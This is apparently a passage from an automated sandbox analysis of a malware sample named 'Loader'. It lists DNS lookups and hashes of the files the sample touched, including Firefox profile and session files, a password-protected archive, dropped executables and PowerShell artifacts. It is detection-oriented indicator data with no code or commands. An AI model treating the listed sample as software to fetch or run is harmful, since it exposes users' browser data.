| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\vg8iw5f0.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | 2598e5b4dccaf42ca1e6b7d4b3895c44 |
| SHA1 | 5b5f08dcc8908ceae1406c75cd6260bff59a9f8f |
| SHA256 | df723479628d62419aadeeb5416f0e25f5fec9a871af86b51cfd2d07d5a3aaf6 |
| SHA512 | 092955090e0662d95d74201b46c42b8a6ac348925c05cb1f5c2bf365ff2307c2a0d6fb10af7f200b796acea5ddc4314f73c502b824398b0801358146197a374c |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\vg8iw5f0.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | dc57db19f0de72dcbbf1a04ff0f5e86d |
| SHA1 | 80a4c97bb24b6955ba50c30593dd85098dbdfd76 |
| SHA256 | d2bbea9a66e658febfc98b914d86f5b30b89af6a36cf75486d548e0bbc6a8ad6 |
| SHA512 | 38dad3701b91ad8040d505531493c743ac4b412b9b2e5fa58a17155fa25f24f44ad380f1fbf60409f5d387ce75f8fe9b94887fd24daed5f2dcc4d11fafe49276 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vg8iw5f0.default-release\prefs.js
| MD5 | 0b76dc8627f91f2e50fe09ce39761b7e |
| SHA1 | 79388afe6894ba09580c6973d787ed84d5ff4129 |
| SHA256 | 8d1b7523a22eea9b4f68fe569b2adf426d6eb19c6c5e8dda05dd3e81bc546cfa |
| SHA512 | 16927a3ada01e3a1f748083fd61fc9fbcbde1cbb7707259a131162918a504692584b79187e2da1d738eda6ed53f90f215c7180a300315d369dd4c732c65fa60c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vg8iw5f0.default-release\prefs-1.js
| MD5 | a66905362a294093677fe2ec5ae87b17 |
| SHA1 | c4c2099ee3afbc57c6734e0e6b64e188d341dc57 |
| SHA256 | 5c6e75319e199c322b9a139261a0babb495dc4b2c6220a4e4aff14e12fcb0583 |
| SHA512 | 3e4d88009c27960453379dc3b1ac1f7be3a00d9836349fef6c356341711c2d6abaed36b3d82c336f4eab2429f4d42afc756f15bd34d04d803270db28d0809f94 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vg8iw5f0.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | e1ab55dc19fe8e6bac19e6f80f334211 |
| SHA1 | affbf49b668d04777eadf532691bdcb88a70c404 |
| SHA256 | fa652a3f758fc1fb67a76e3ce6b7028420fdecc78c281c56e81f97cf79902111 |
| SHA512 | ca121c3ca2c8d69a09805019ba0060bd21a75b9cbd532a483e57b430f611dad38785f6f2bb0f38132173ed2c8ec0a6d012226c52bdf95b0be2f44792c0c4ef79 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\vg8iw5f0.default-release\cache2\entries\2547F4F8D6358638CDE0B31A1322D63360CA032C
| MD5 | fac8e728a7e936d520d0233ac95a075d |
| SHA1 | 6c64540574720a1b41c198e31d2330a77020b0f0 |
| SHA256 | 58abff0a97f5fdb2d20b85f60634db25ad0e90c1b9883068cdaef1fc6e9f53d0 |
| SHA512 | fa842dfe13509548fda0a73a81c014f16813a2cca19755b59b326f28bcf19f05928e1018b31a208c80fab2633f3e6a7fd0df13ad48f45b4a01ea2e5af999fdb3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vg8iw5f0.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 90c25fc8a326cde248dd8ab4cd94b552 |
| SHA1 | b7e73aea962c2358ab865fe64c39fd7893be2621 |
| SHA256 | b0d06172b7537e7687fdb22d9917bf00d44adf477cc82a25da8a1a537f8fc04d |
| SHA512 | 856074f4a92f89ecace970d296186c15914ed4ba3a13db3caabf0efce5e6d2b9b2c4896e04277ead1d2ab26e97faa8eef2e39e5a01eb5670bfc8667953f91b64 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vg8iw5f0.default-release\prefs-1.js
| MD5 | d3a6ace8f20b45b04f51187c996b9e56 |
| SHA1 | d81c3addcc09e57f102368aa697a72881fc4b840 |
| SHA256 | ceda56b1298a7c8fe1c249f283e2972d8b2a09257ce02cd73ce0a1d4fe3b4552 |
| SHA512 | cc42aba9fa69c25292ef1af85b5acb1bec366baf4a7da0c2f1effe1aba91379b53f7d9258ad117e5ec35c1c276ec599b59bdf26314bf3dca17a8ce8e493746cd |
C:\Users\Admin\Downloads\Loader.eKmXoUI1.rar.part
| MD5 | 42e38327aa043c8973d77f002d2f1a33 |
| SHA1 | 2835af4a7efe108fdfb91d11436f5f773922eda2 |
| SHA256 | fe6255c6b1573472191a4a4390d4d3152b70224b23e4a71afe67144b7f183467 |
| SHA512 | d2f40726244d2752b35830f16513d9f64b1e598183312950bc0331df6ee44059eb5e3b3bfac4a6853478b449e2cf7a634d35d1c26a607301b1a6a5e6b5b73391 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vg8iw5f0.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | ab9b6bbccae774bf4f714666d2efc22f |
| SHA1 | f4d247e6f2523f101655e516de893327a2800ab6 |
| SHA256 | 379126eefee0a5c2187b4fbc368072efdc60e809af09a9e8d88a0fa4e5e0bd33 |
| SHA512 | 23a81cafa78fdeedab2f8342d09115e6790d7110e76706b087941b5c7f0825107836f82f82abc358b900d6ed0915a28d0ee95d7fb053ab613b27e07869a6835e |
C:\Users\Admin\Downloads\Loader\password.txt
| MD5 | 1477c4e39ff2fed1baac4e4f489d0a4c |
| SHA1 | f1c5dde0136bbc26070d2a63e553177371cbbcf1 |
| SHA256 | 1eb716479b1705aad74bcc7d0a53e38a7df13f7e09bb9408a2073c81a297888e |
| SHA512 | 3eb875441744cea3919ffe23d540c7f9addcb55c66cf73f2bafb0c6adddbffc729daa860703251dfe579a3cfefb80f9441499cf83090472bd68e9e25d2d28d37 |
C:\Users\Admin\Downloads\Loader\Loader.rar
| MD5 | f32be7992696caff77f94dce6961089e |
| SHA1 | 0396281c809dc5f1ebb0d6e755d28e598d2ad506 |
| SHA256 | 9c54420994a1b38f19ad2d5ce56fd5b92693b0ca2f1052dd0e709d0b7ece7e2a |
| SHA512 | 418b177ea1a25aaac6c376a821443ee268ec6dc474b5ec6cef029587c817c6b8bc1eb7f96b6321aff83af7733fb5fcee644a64ec1dfff17efc4ac4bda9c1cc3b |
C:\Users\Admin\Downloads\Loader\Loader\Loader\Loader.exe
| MD5 | 31decf4cb27130221a8166ab23fccddc |
| SHA1 | 436c8647384cc0d28edbb718d842fd6f9d98d498 |
| SHA256 | 455af6216bf7abc51fb3d08d29862bd2dfafb1351fee7bb46b56b7af8e9ccb24 |
| SHA512 | 72805d772261d88728ce041552da872fa58b3c54104290dd5e6ea649b99529007a02a6b03ca05290ff2c030242804f1eb1237740966ab2a803617b9233bec4b8 |
memory/3528-336-0x0000000000770000-0x0000000000778000-memory.dmp
memory/3536-338-0x000002082D680000-0x000002082D6A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mfdvk04e.rxq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\1o35kcks.mos0.exe
| MD5 | 01a2f455cbe0cc72c58c60acff46c5c5 |
| SHA1 | 7f447f7c8606725d3418f7f6b5c8a91ead0c246f |
| SHA256 | e8e12bc924dda41abbd2b38031b05a7c782e08bd6adccf4baaea3f44b6833462 |
| SHA512 | 31a09211f2d3275cb9ee4c0a6e7f814c1c9953fe73e27c46cec01c34b39b63096186c4009964e81c28f237d4384d7a3a67bc533f642a82c84f46fb3057b4c8f3 |
memory/4376-360-0x0000000000D00000-0x0000000000D4E000-memory.dmp
memory/4376-361-0x00000000056D0000-0x00000000056EE000-memory.dmp
memory/4376-362-0x00000000060D0000-0x0000000006674000-memory.dmp
memory/4376-363-0x0000000005BC0000-0x0000000005C52000-memory.dmp
memory/4376-364-0x0000000005B40000-0x0000000005B4A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Loader.exe.log
| MD5 | 28d7fcc2b910da5e67ebb99451a5f598 |
| SHA1 | a5bf77a53eda1208f4f37d09d82da0b9915a6747 |
| SHA256 | 2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c |
| SHA512 | 2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 806286a9ea8981d782ba5872780e6a4c |
| SHA1 | 99fe6f0c1098145a7b60fda68af7e10880f145da |
| SHA256 | cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713 |
| SHA512 | 362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e |